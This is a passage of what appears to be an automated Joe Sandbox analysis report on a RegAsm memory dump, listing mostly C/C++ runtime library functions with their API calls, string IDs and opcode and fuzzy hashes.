                                                                                                                                                                                                                                            • Instruction ID: a56c8e332ea45dc530618a1a94d2c359f5915028fee701a0cac8cc098a6f2e50
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b7dd62dbc9dfedf20a5674f537840bd6a9ddecca403dfe298fcd1bb64d7a993
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E63121716402459BD714DBA4C88ABFE7FF9FB4371DF14081DE581972A2DBB0990ACB50
                                                                                                                                                                                                                                            Function 005459FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 005432B3: pDNameNode::pDNameNode.LIBCMT ref: 005432D9
                                                                                                                                                                                                                                            • DName::DName.LIBVCRUNTIME ref: 00545ABB
                                                                                                                                                                                                                                            • DName::operator+.LIBCMT ref: 00545AC9
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Name$Name::Name::operator+NodeNode::p
                                                                                                                                                                                                                                            • String ID: void$void
                                                                                                                                                                                                                                            • API String ID: 3257498322-3746155364
                                                                                                                                                                                                                                            • Opcode ID: 092c38c67d57109e8c5c44f51d133c21473957da2c7f1d63822d9f19b294ac06
                                                                                                                                                                                                                                            • Instruction ID: e1586b2641ddf465875d9622ddbbabc739ad76614693ec7c0d0d1a057604b9d3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 092c38c67d57109e8c5c44f51d133c21473957da2c7f1d63822d9f19b294ac06
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A216275C0420DAFDB05DF90D85A9FEBFB8FB04308F14855AE91167261E7705648DF90
                                                                                                                                                                                                                                            Function 00540B81 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RaiseException.KERNEL32(E06D7363,00000001,00000003,BS,?,?,?,?,0053E642,?,00588EB8), ref: 00540BE1
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionRaise
                                                                                                                                                                                                                                            • String ID: BS$BS$uS
                                                                                                                                                                                                                                            • API String ID: 3997070919-2206541984
                                                                                                                                                                                                                                            • Opcode ID: e1124269f4bf9cebe6574ce1e2b1bd7a7d60b0c34b683b0bc2485acf126c4bcb
                                                                                                                                                                                                                                            • Instruction ID: 8743a6e4ccbb16be51a9759d8c086da25a12cc0b164b9960dc5b549162f352b5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e1124269f4bf9cebe6574ce1e2b1bd7a7d60b0c34b683b0bc2485acf126c4bcb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8018F76900208ABD7019F6CD884BAEBFB8FF44718F254159EE55AB390D7B0AD00CBD0
                                                                                                                                                                                                                                            Function 00567370 Relevance: 6.3, APIs: 4, Instructions: 275COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __FindPESection.LIBCMT ref: 005674A1
                                                                                                                                                                                                                                            • VirtualQuery.KERNEL32(83000000,CA1D138C,0000001C,CA1D138C,?,?,?), ref: 00567586
                                                                                                                                                                                                                                            • __FindPESection.LIBCMT ref: 005675C3
                                                                                                                                                                                                                                            • __FindPESection.LIBCMT ref: 005675FD
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FindSection$QueryVirtual
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2992484814-0
                                                                                                                                                                                                                                            • Opcode ID: 323e48d8b8d08ef91de50fac3319ebba96658270041aac83c517efd03ebddc17
                                                                                                                                                                                                                                            • Instruction ID: 8f7d52035f1aaf9361f41c8e2b97acc93c30f34545eea08c55619960dac2fa39
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 323e48d8b8d08ef91de50fac3319ebba96658270041aac83c517efd03ebddc17
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AEA1D271E0461A8FDB20CF58D9846ADBFB4FB58328F11056AD81AE7391E731ED45CB90
                                                                                                                                                                                                                                            Function 0054614E Relevance: 6.2, APIs: 4, Instructions: 169COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DName::operator+.LIBCMT ref: 00546283
                                                                                                                                                                                                                                              • Part of subcall function 005433C6: __aulldvrm.LIBCMT ref: 005433F7
                                                                                                                                                                                                                                            • DName::operator+.LIBCMT ref: 005461E4
                                                                                                                                                                                                                                            • DName::operator=.LIBVCRUNTIME ref: 005462C8
                                                                                                                                                                                                                                            • DName::DName.LIBVCRUNTIME ref: 005462FA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Name::operator+$NameName::Name::operator=__aulldvrm
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2973644308-0
                                                                                                                                                                                                                                            • Opcode ID: eb3fe6bcec78a16d1778c550908613eed267dd70cf757a5a7a6ea6ebe477dac2
                                                                                                                                                                                                                                            • Instruction ID: d86121d32e947466586a06139f643f4ccfc9e72382077ba6a5573020e88006f8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb3fe6bcec78a16d1778c550908613eed267dd70cf757a5a7a6ea6ebe477dac2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36619EB4904256EFCB04CF98D885BEDBFB4FB56308F14845AE9416B361C7B09A40DF91
                                                                                                                                                                                                                                            Function 0051B7F0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 109COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000010), ref: 0051B813
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                                            • String ID: operation failed with error $OS_Rng: $P@
                                                                                                                                                                                                                                            • API String ID: 1452528299-2227021971
                                                                                                                                                                                                                                            • Opcode ID: 1cdcac5a31a7b39ab1d5edd5b6dd1bf23f4053624ce40617683c2b6aa9ed0fe3
                                                                                                                                                                                                                                            • Instruction ID: ab2645774e2d84d6bb8c95844b5da00fe88cedc599a1c9abba14ca5f5f483051
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1cdcac5a31a7b39ab1d5edd5b6dd1bf23f4053624ce40617683c2b6aa9ed0fe3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 265137B1D00208EFCB04DFA9D951BEEBBB4BF48304F2085ADE415A7381DB745A44CBA4
                                                                                                                                                                                                                                            Function 00564ECA Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,005614E8,00000000,00000001,0000000C,00000000,?,00558003,00000000,00000000,00000000), ref: 00564EE1
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,005614E8,00000000,00000001,0000000C,00000000,?,00558003,00000000,00000000,00000000,00000000,00000000,?,005585DD,?), ref: 00564EED
                                                                                                                                                                                                                                              • Part of subcall function 00564EB3: CloseHandle.KERNEL32(FFFFFFFE,00564EFD,?,005614E8,00000000,00000001,0000000C,00000000,?,00558003,00000000,00000000,00000000,00000000,00000000), ref: 00564EC3
                                                                                                                                                                                                                                            • ___initconout.LIBCMT ref: 00564EFD
                                                                                                                                                                                                                                              • Part of subcall function 00564E75: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00564EA4,005614D5,00000000,?,00558003,00000000,00000000,00000000,00000000), ref: 00564E88
                                                                                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,005614E8,00000000,00000001,0000000C,00000000,?,00558003,00000000,00000000,00000000,00000000), ref: 00564F12
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2744216297-0
                                                                                                                                                                                                                                            • Opcode ID: 78a1af474d07b0761b00585404e8e391e417f1564a84e024ca867a01b0b9ae7e
                                                                                                                                                                                                                                            • Instruction ID: 93e8362ec68e7f539381af621a390f8b073cdb562b1e8d5ead4fe94aa1b2800d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 78a1af474d07b0761b00585404e8e391e417f1564a84e024ca867a01b0b9ae7e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8F01C36500129BBDF222FA5EC0C98A7F66FB583B1B004120FA2897120D7328864EF91
                                                                                                                                                                                                                                            Function 0055465A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 291COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __aulldiv
                                                                                                                                                                                                                                            • String ID: +$-
                                                                                                                                                                                                                                            • API String ID: 3732870572-2137968064
                                                                                                                                                                                                                                            • Opcode ID: 0eb73403c6ad4f2bb151b54228d5cb837cf2bad058a209e406f441fac7a18394
                                                                                                                                                                                                                                            • Instruction ID: 4f247e70a663acb8c3d52ea08d6a81d749537a2582cef42202ba693493f8c53a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0eb73403c6ad4f2bb151b54228d5cb837cf2bad058a209e406f441fac7a18394
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CA1C330910259AFDF14CE69C8606FE7FB1FF5A32AF14855BEC659B281D330998A8F50
                                                                                                                                                                                                                                            Function 00420E20 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 251COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 00420FF9
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __aulldiv
                                                                                                                                                                                                                                            • String ID: n{$}{
                                                                                                                                                                                                                                            • API String ID: 3732870572-1042045087
                                                                                                                                                                                                                                            • Opcode ID: bb7ac5a190c8fe079a9ac3989b4573cd2aec50649a18d77b221becce7819b8f2
                                                                                                                                                                                                                                            • Instruction ID: eaf1b40876ff27981f157cc11598657eb5f85387195161b8bd6187d6507d60f7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bb7ac5a190c8fe079a9ac3989b4573cd2aec50649a18d77b221becce7819b8f2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D910FB1E012189FDB54CBA8DC81BAEB7F6FB88315F248129F908F7350D678AD458B54
                                                                                                                                                                                                                                            Function 005481D7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Replicator::operator[].LIBCMT ref: 00548232
                                                                                                                                                                                                                                            • DName::DName.LIBVCRUNTIME ref: 0054837D
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: NameName::Replicator::operator[]
                                                                                                                                                                                                                                            • String ID: ...
                                                                                                                                                                                                                                            • API String ID: 3707554701-440645147
                                                                                                                                                                                                                                            • Opcode ID: d566767256c45ac9024f25040ca0f9eb3eb5680452e3da8451354c959b671c0f
                                                                                                                                                                                                                                            • Instruction ID: 7c1d151daa1fdf41879bfbd09309a77717fd8c1bd198b0cf7ac1fb5391288f9b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d566767256c45ac9024f25040ca0f9eb3eb5680452e3da8451354c959b671c0f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A151C274908645AFDB15CFA8D8896FDBFF4BF16708F08885ED941A7361CB709A08CB50
                                                                                                                                                                                                                                            Function 0041A590 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 136COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _memcpy_s
                                                                                                                                                                                                                                            • String ID: HHA$HHA
                                                                                                                                                                                                                                            • API String ID: 2001391462-78794114
                                                                                                                                                                                                                                            • Opcode ID: d22e5025005132be8ae8e07c2e5cc95db775846b98abc1004e97a32bd5275221
                                                                                                                                                                                                                                            • Instruction ID: 58fc70c8d1e743df8a21e54f01107f1756ebb3a48e4e49249704d6386acab13f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d22e5025005132be8ae8e07c2e5cc95db775846b98abc1004e97a32bd5275221
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4514AB9D01209ABDF04DF94D845AEF77B5BB44304F14842AE81997341E738EAA1CB66
                                                                                                                                                                                                                                            Function 005478C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DName::DName.LIBVCRUNTIME ref: 005479C4
                                                                                                                                                                                                                                              • Part of subcall function 0054368A: shared_ptr.LIBCMT ref: 005436A6
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: NameName::shared_ptr
                                                                                                                                                                                                                                            • String ID: amp$cpu
                                                                                                                                                                                                                                            • API String ID: 2125921051-2542064945
                                                                                                                                                                                                                                            • Opcode ID: 0a978f6666f21e7a2572c74bff3a0ae62f5ae6c462e1d02818d8be69e98e94c7
                                                                                                                                                                                                                                            • Instruction ID: a4d0f1cdb0f4c3c86660b698ae3bc36252cfffd7a370057d30f631594d00f0d4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a978f6666f21e7a2572c74bff3a0ae62f5ae6c462e1d02818d8be69e98e94c7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7131807190821EAFCB04DF98C845AFDBFB4BB99318F10405AE585A7361D7309A04CB90
                                                                                                                                                                                                                                            Function 0054051C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • ___unDName.LIBVCRUNTIME ref: 00540549
                                                                                                                                                                                                                                              • Part of subcall function 005496F8: ___unDNameEx.LIBVCRUNTIME ref: 00549711
                                                                                                                                                                                                                                            • InterlockedPushEntrySList.KERNEL32(0040F01D,0040F01D,?,?,?,?,?,?,?,?,?,0040F01D,?,0058E940), ref: 005405C4
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Name___un$EntryInterlockedListPush
                                                                                                                                                                                                                                            • String ID: @X
                                                                                                                                                                                                                                            • API String ID: 723550680-3927199268
                                                                                                                                                                                                                                            • Opcode ID: 227ca6a570cde2c246336002fd2555bf695669cbe09e84dec2d86bdc94294ec0
                                                                                                                                                                                                                                            • Instruction ID: df260370169ace51d469760d7011fdbb54e4a96fff24df410436cdc31a6c4d77
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 227ca6a570cde2c246336002fd2555bf695669cbe09e84dec2d86bdc94294ec0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8221D731500205AFDB11DF68CC89DEA7FB8FF8536CB245069E5059B281E672DE46CB90
                                                                                                                                                                                                                                            Function 005672A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FindSection
                                                                                                                                                                                                                                            • String ID: uV
                                                                                                                                                                                                                                            • API String ID: 3341428096-879881710
                                                                                                                                                                                                                                            • Opcode ID: 6db0b88c1412987f114ec55f2907211f7ca3cc8bb38a2f1ba2eedb8865635bc2
                                                                                                                                                                                                                                            • Instruction ID: 661ab4177a07af66d8fe5b21dea799d538a8981b05d13e8cdccb76cfcd0d1b94
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6db0b88c1412987f114ec55f2907211f7ca3cc8bb38a2f1ba2eedb8865635bc2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D21FB32B0422A4BCF349A2CDC846AA7B5ABB4833CB1A4719DC68573C5DB30EC41D6D4
                                                                                                                                                                                                                                            Function 005463B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: NameName::
                                                                                                                                                                                                                                            • String ID: A
                                                                                                                                                                                                                                            • API String ID: 1333004437-3554254475
                                                                                                                                                                                                                                            • Opcode ID: 2fdc20fddfea1591c3d5a697cac88cf68f1fc6810f6cfe2fbcf50ae7afa78082
                                                                                                                                                                                                                                            • Instruction ID: ad5c5cdc900119de4e1c1a943c798a011e003d9e89420341421d5f873e963e72
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2fdc20fddfea1591c3d5a697cac88cf68f1fc6810f6cfe2fbcf50ae7afa78082
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C219D74904149AFDF04DF94D846BEC7FB1FB86308F10C859E9456B261C7709A49EB42
                                                                                                                                                                                                                                            Function 0040E300 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040E314
                                                                                                                                                                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E3C1
                                                                                                                                                                                                                                              • Part of subcall function 0053F2A2: _Yarn.LIBCPMT ref: 0053F2C1
                                                                                                                                                                                                                                              • Part of subcall function 0053F2A2: _Yarn.LIBCPMT ref: 0053F2E5
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                                                                            • String ID: bad locale name
                                                                                                                                                                                                                                            • API String ID: 1908188788-1405518554
                                                                                                                                                                                                                                            • Opcode ID: 09efe5c459f684f080d25be1aa42f4a05728932db351713f5b067b284370b649
                                                                                                                                                                                                                                            • Instruction ID: f7ef2f4ab1df595a199d7dad6d9cd8243b94916aedc5e8d5d18da55d8c9c26c6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09efe5c459f684f080d25be1aa42f4a05728932db351713f5b067b284370b649
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E831F8B4E04209DFDB04CF98D995BAEFBB1FF48304F248199D805AB381C775AA51CBA5
                                                                                                                                                                                                                                            Function 004164F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _memcpy_s
                                                                                                                                                                                                                                            • String ID: eVA$eVA
                                                                                                                                                                                                                                            • API String ID: 2001391462-2010160217
                                                                                                                                                                                                                                            • Opcode ID: 840fe47f7f40b0dd22249d9de1a3239d75facf5a1c0f6b941722fd50a3e2e93c
                                                                                                                                                                                                                                            • Instruction ID: 9ab3e6916cf0d860965d67e495f956fdb17b34ad4b651c815909af831e30d601
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 840fe47f7f40b0dd22249d9de1a3239d75facf5a1c0f6b941722fd50a3e2e93c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2531AA74A04208EFDB04CF98D094BEEB7B5BF48344F2481A9D8489B346D775AE85DF94
                                                                                                                                                                                                                                            Function 00544B73 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: NameName::Name::operator+=
                                                                                                                                                                                                                                            • String ID: void
                                                                                                                                                                                                                                            • API String ID: 2247604192-3531332078
                                                                                                                                                                                                                                            • Opcode ID: 6ab67c0c92cd683935c3d760e861924ecaa3ee2f924fa67f1b4545954e850829
                                                                                                                                                                                                                                            • Instruction ID: 0b70565bd5bc2618c294dadaf4d02abc9ed392641c077eee4745f215ef411b4f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ab67c0c92cd683935c3d760e861924ecaa3ee2f924fa67f1b4545954e850829
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F1151B584421AAACF04EFA4C85ABFEBFB8FF44318F00455AE445A7295DB749744CF90
                                                                                                                                                                                                                                            Function 00415540 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0041557C
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                            • String ID: `XA$`@
                                                                                                                                                                                                                                            • API String ID: 323602529-3161672447
                                                                                                                                                                                                                                            • Opcode ID: 3128ecd62594a78fb7fb2ec53101d4ae7a17aa0d33a748a3408eb6d821d1f301
                                                                                                                                                                                                                                            • Instruction ID: df04170afd1a3dfcbc914767939652a0ad6efa564f7c33baab53c77d9c69497a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3128ecd62594a78fb7fb2ec53101d4ae7a17aa0d33a748a3408eb6d821d1f301
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ABF0FFB1D00209EFCF04DFA8D95599EBFB5AB81300F9441A9E404BF345DA35AF50CB95
                                                                                                                                                                                                                                            Function 004155B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004155EC
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
